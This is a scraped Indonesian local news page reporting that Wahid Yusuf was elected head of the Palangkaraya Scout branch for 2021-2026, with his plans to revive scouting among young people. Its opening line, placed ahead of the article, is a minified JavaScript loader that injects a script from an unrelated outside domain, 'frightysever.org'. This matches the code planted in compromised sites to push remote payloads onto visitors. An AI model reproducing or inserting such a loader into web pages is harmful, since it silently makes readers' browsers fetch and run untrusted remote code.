(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Palangkaraya

Wahid Yusuf Ketua Kwarcab Pramuka Palangkaraya


KANALKALIMANTAN.COM, PALANGKARAYA – Wakil Ketua I DPRD Kota Palangkaraya Wahid Yusuf terpilih menjadi Ketua Kwartir Cabang (Kwarcab) Pramuka Palangkaraya periode 2021-2026.

Wahid menggantikan mantan Wakil Wali Kota Palangkaraya Mofit Saptono Subagio dalam Musyawarah Daerah (Musda) di aula Rujab Wali Kota, Rabu (10/2/2021).

“Saya ucapkan terima kasih atas kepercayaan kakak kakak pembina dan senior, terutama untuk Kak Mofit Saptono,” kata Wahid saat dihubungi melalui telepon seluler, Kamis (11/2/2021).

Ia berjanji akan meneruskan jejak kepimpinan Ketua Kwarcab Palangkaraya sebelumnya, sehingga bisa menjadi barometer pramuka di Kalimantan Tengah.

Menurut Wahid, dirinya tinggal melanjutkan apa yang telah dibentuk dan dibina oleh ketua sebelumnya, karena Kwarcab Palangkaraya selamat ini sudah berjalan baik.

Hanya saja kedepan, ia akan lebih menggalakan pusat pendidikan pramuka dan memperkenalkan organisasi ini lebih intens lagi ke kaum milenial, sehingga tertarik bergabung.

“Pramuka harus digalakan kembali, mengingat pramuka merupakan regenerasi pemuda dan pramuka merupakan tonggak Pancasila,” ujarnya.

Tak dipungkiri saat ini ketertarikan milenial ikut pramuka tidak seperti masa ia masih sekolah dulu, yang hampir setiap saat ada kegiatan pramuka.

Oleh sebab itu, setelah Covid-19 berakhir, kegiatan pramuka akan kembali dihidupkan lagi, yang saat ini mulai tergerus zaman.

“Insyaallah mohon doanya, semoga saya dapat membawa Kwarcab Pramuka bisa lebih maju dan baik lagi,” pungkasnya. (kanalkalimantan.com/tri)

 

Reporter : Tri
Editor : Bie

 

 

 


Al Ghifari

Recent Posts

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

39 menit ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

2 jam ago

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

3 jam ago

DED Pemasangan ATCS Tugu Adipura Masih Penyempurnaan Kajian

Kadishub Banjarbaru: Setelah Kajian Selesai, Berikutnya Perizinan BPJN dan BPTD Read More

4 jam ago

Hadiri HUT ke-44 Dekranas, Ini Kata Ketua Dekranasda HSU

KANALKALIMANTAN.COM, SOLO - Ketua Dewan Kerajinan Nasional Daerah (Dekranasda) Hulu Sungai Utara (HSU) Gusti Elvira… Read More

5 jam ago

SKPD Mengajar di SMPN 2 Banjarbaru, Wali Kota Aditya Ngajar Kelas Inspirasi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin memulai program SKPD Instansi Mengajar dengan… Read More

6 jam ago

This website uses cookies.